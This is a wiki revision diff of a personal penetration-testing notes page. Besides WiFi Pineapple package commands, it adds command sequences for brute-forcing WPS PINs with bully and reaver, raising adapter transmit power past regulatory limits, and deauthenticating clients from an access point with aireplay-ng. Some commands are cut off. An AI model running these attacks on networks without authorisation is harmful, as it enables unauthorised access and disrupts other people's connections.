pentest:start
Differences
This shows you the differences between two versions of the page.
Next revision | Previous revision | ||
pentest:start [2014/10/31 05:29] – created michaelurspringer | pentest:start [2014/12/23 15:08] (current) – michaelurspringer | ||
---|---|---|---|
Line 1: | Line 1: | ||
=== Install Packages in Pineapple === | === Install Packages in Pineapple === | ||
- | opkg udpate | + | opkg udpate\\ |
- | opkg install ... | + | opkg install ...\\ |
- | opkg list-installed | + | opkg list-installed\\ |
- | opkg remove ... | + | opkg remove ...\\ |
+ | |||
+ | === Crack WPS === | ||
+ | |||
+ | # Start monitor interface\\ | ||
+ | airmon-ng start wlan0\\ | ||
+ | \\ | ||
+ | # Check for WLAN networks nearby\\ | ||
+ | airodump-ng mon0\\ | ||
+ | \\ | ||
+ | # Check for WPS enabled devices\\ | ||
+ | wash -i mon0 --ignore-fcs\\ | ||
+ | \\ | ||
+ | # Bully for bruteforce attack of WPS key\\ | ||
+ | bully -B mon0 -o < | ||
+ | Alternative: | ||
+ | reaver -i mon0 -vv -b < | ||
+ | |||
+ | === Higher Power for Realtek RTL8187 Wifi Adapter === | ||
+ | |||
+ | # Does not work!? \\ | ||
+ | modprobe rtl8187\\ | ||
+ | iw reg set B0\\ | ||
+ | iw dev wlan0 set txpower auto\\ | ||
+ | # check: \\ | ||
+ | iwlist wlan 0 txpower | grep " | ||
+ | |||
+ | |||
+ | === Deauth client from AP === | ||
+ | |||
+ | aireplay-ng -0 10 -a <BSSID AP> -c <BSSID CLient; optional> | ||
+ | |||
+ | === Links === | ||
+ | |||
+ | https:// | ||
pentest/start.1414733385.txt · Last modified: 2014/10/31 05:29 by michaelurspringer